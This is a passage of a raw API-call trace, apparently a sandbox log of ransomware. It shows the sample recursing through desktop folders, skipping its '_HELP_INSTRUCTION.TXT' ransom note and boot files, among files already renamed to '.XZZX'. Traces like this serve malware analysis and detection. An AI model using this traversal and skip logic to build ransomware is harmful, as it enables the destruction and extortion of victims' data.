lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.887] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0228.887] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0228.888] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0228.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0228.888] SetErrorMode (uMode=0x1) returned 0x1 [0228.888] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0228.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.888] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.888] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0228.888] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.888] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0228.888] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0228.888] StrStrW (lpFirst="2F277C800E3D000EDE26BEC010D7E456.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.888] StrStrW (lpFirst="2F277C800E3D000EDE26BEC010D7E456.XZZX", lpSrch="ntldr") returned 0x0 [0228.888] StrStrW (lpFirst="2F277C800E3D000EDE26BEC010D7E456.XZZX", lpSrch="NTLDR") returned 0x0 [0228.888] StrStrW (lpFirst="2F277C800E3D000EDE26BEC010D7E456.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.888] StrStrW (lpFirst="2F277C800E3D000EDE26BEC010D7E456.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.888] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.888] lstrcmpW (lpString1="47B40A10111A83A88A73451213B567F0.XZZX", lpString2="..") returned 1 [0228.888] lstrcmpW (lpString1="47B40A10111A83A88A73451213B567F0.XZZX", lpString2=".") returned 1 [0228.888] StrStrW (lpFirst="47B40A10111A83A88A73451213B567F0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.888] StrStrW (lpFirst="47B40A10111A83A88A73451213B567F0.XZZX", lpSrch="ntldr") returned 0x0 [0228.888] StrStrW (lpFirst="47B40A10111A83A88A73451213B567F0.XZZX", lpSrch="NTLDR") returned 0x0 [0228.888] StrStrW (lpFirst="47B40A10111A83A88A73451213B567F0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.888] StrStrW (lpFirst="47B40A10111A83A88A73451213B567F0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.888] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.888] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.888] lstrcmpW (lpString1="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpString2="..") returned 1 [0228.888] lstrcmpW (lpString1="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpString2=".") returned 1 [0228.888] StrStrW (lpFirst="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.889] StrStrW (lpFirst="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpSrch="ntldr") returned 0x0 [0228.889] StrStrW (lpFirst="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpSrch="NTLDR") returned 0x0 [0228.889] StrStrW (lpFirst="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.889] StrStrW (lpFirst="4F6F3FD029568B304D8CACEB2BF16F78.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.889] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.889] lstrcmpW (lpString1="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpString2="..") returned 1 [0228.889] lstrcmpW (lpString1="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpString2=".") returned 1 [0228.889] StrStrW (lpFirst="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.889] StrStrW (lpFirst="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpSrch="ntldr") returned 0x0 [0228.889] StrStrW (lpFirst="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpSrch="NTLDR") returned 0x0 [0228.889] StrStrW (lpFirst="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.889] StrStrW (lpFirst="AC5C0F1C3DCF4B0220525E54406A2F4A.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.889] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.889] lstrcmpW (lpString1="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpString2="..") returned 1 [0228.889] lstrcmpW (lpString1="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpString2=".") returned 1 [0228.889] StrStrW (lpFirst="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.889] StrStrW (lpFirst="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpSrch="ntldr") returned 0x0 [0228.889] StrStrW (lpFirst="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpSrch="NTLDR") returned 0x0 [0228.889] StrStrW (lpFirst="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.889] StrStrW (lpFirst="C85257232EB7E6DDB4D24C9F3152CB25.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.889] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.889] lstrcmpW (lpString1="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpString2="..") returned 1 [0228.889] lstrcmpW (lpString1="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpString2=".") returned 1 [0228.889] StrStrW (lpFirst="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.889] StrStrW (lpFirst="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpSrch="ntldr") returned 0x0 [0228.889] StrStrW (lpFirst="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpSrch="NTLDR") returned 0x0 [0228.889] StrStrW (lpFirst="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.889] StrStrW (lpFirst="F3DB6DE6267426E7B67A0B4A290F0B2F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.889] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.889] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.889] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.889] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.889] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.889] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0228.890] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0228.890] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0228.890] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0228.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0228.890] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0228.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.890] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0228.890] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0228.890] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0228.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0228.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0228.890] SetErrorMode (uMode=0x1) returned 0x1 [0228.890] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0228.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0228.890] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0228.890] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0228.890] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.890] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0228.890] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0228.890] StrStrW (lpFirst="074B93892CEB8207FA07ADC92F86664F.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.890] StrStrW (lpFirst="074B93892CEB8207FA07ADC92F86664F.XZZX", lpSrch="ntldr") returned 0x0 [0228.890] StrStrW (lpFirst="074B93892CEB8207FA07ADC92F86664F.XZZX", lpSrch="NTLDR") returned 0x0 [0228.891] StrStrW (lpFirst="074B93892CEB8207FA07ADC92F86664F.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.891] StrStrW (lpFirst="074B93892CEB8207FA07ADC92F86664F.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.891] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0228.891] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.891] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.891] lstrcmpW (lpString1="6F61A1B801317143207838E803DC558B.XZZX", lpString2="..") returned 1 [0228.891] lstrcmpW (lpString1="6F61A1B801317143207838E803DC558B.XZZX", lpString2=".") returned 1 [0228.891] StrStrW (lpFirst="6F61A1B801317143207838E803DC558B.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.891] StrStrW (lpFirst="6F61A1B801317143207838E803DC558B.XZZX", lpSrch="ntldr") returned 0x0 [0228.891] StrStrW (lpFirst="6F61A1B801317143207838E803DC558B.XZZX", lpSrch="NTLDR") returned 0x0 [0228.891] StrStrW (lpFirst="6F61A1B801317143207838E803DC558B.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.891] StrStrW (lpFirst="6F61A1B801317143207838E803DC558B.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.891] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0228.891] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.891] lstrcmpW (lpString1="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpString2="..") returned 1 [0228.891] lstrcmpW (lpString1="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpString2=".") returned 1 [0228.891] StrStrW (lpFirst="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.891] StrStrW (lpFirst="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpSrch="ntldr") returned 0x0 [0228.891] StrStrW (lpFirst="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpSrch="NTLDR") returned 0x0 [0228.891] StrStrW (lpFirst="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.891] StrStrW (lpFirst="8306832F015A14CA9B3B5FDD03F4F912.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.891] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0228.891] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0228.891] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0228.891] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0228.891] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0228.891] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0228.891] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0228.891] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0228.891] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0228.891] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0228.891] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0228.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0228.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0228.892] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0228.892] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0228.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0228.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0228.892] SetErrorMode (uMode=0x1) returned 0x1 [0228.892] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K" [0228.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.892] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.892] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*" [0228.892] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0228.892] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K") returned="3Yo4kg3p-K" [0228.892] lstrcpyW (in: lpString1=0x17a5a4, lpString2="3Yo4kg3p-K" | out: lpString1="3Yo4kg3p-K") returned="3Yo4kg3p-K" [0228.892] StrStrW (lpFirst="A941655030ADE0983EE0D4E83348C4E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.892] StrStrW (lpFirst="A941655030ADE0983EE0D4E83348C4E0.XZZX", lpSrch="ntldr") returned 0x0 [0228.892] StrStrW (lpFirst="A941655030ADE0983EE0D4E83348C4E0.XZZX", lpSrch="NTLDR") returned 0x0 [0228.892] StrStrW (lpFirst="A941655030ADE0983EE0D4E83348C4E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.892] StrStrW (lpFirst="A941655030ADE0983EE0D4E83348C4E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.892] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0228.892] lstrcmpW (lpString1="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpString2="..") returned 1 [0228.892] lstrcmpW (lpString1="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpString2=".") returned 1 [0228.892] StrStrW (lpFirst="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.892] StrStrW (lpFirst="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpSrch="ntldr") returned 0x0 [0228.892] StrStrW (lpFirst="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpSrch="NTLDR") returned 0x0 [0228.892] StrStrW (lpFirst="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.892] StrStrW (lpFirst="B71609DC2AB3B518FC7896292D5E9960.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.892] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\3Yo4kg3p-K\\" [0228.892] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0228.892] lstrcmpW (lpString1="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpString2="..") returned 1 [0228.892] lstrcmpW (lpString1="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpString2=".") returned 1 [0228.893] StrStrW (lpFirst="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0228.893] StrStrW (lpFirst="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpSrch="ntldr") returned 0x0 [0228.893] StrStrW (lpFirst="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpSrch="NTLDR") returned 0x0 [0228.893] StrStrW (lpFirst="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0228.893] StrStrW (lpFirst="C6FBBCE908271EA962BAF7FD0AC202F1.XZZX", lpSrch="ntdetect.com") returned 0x0 [0228.893] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS 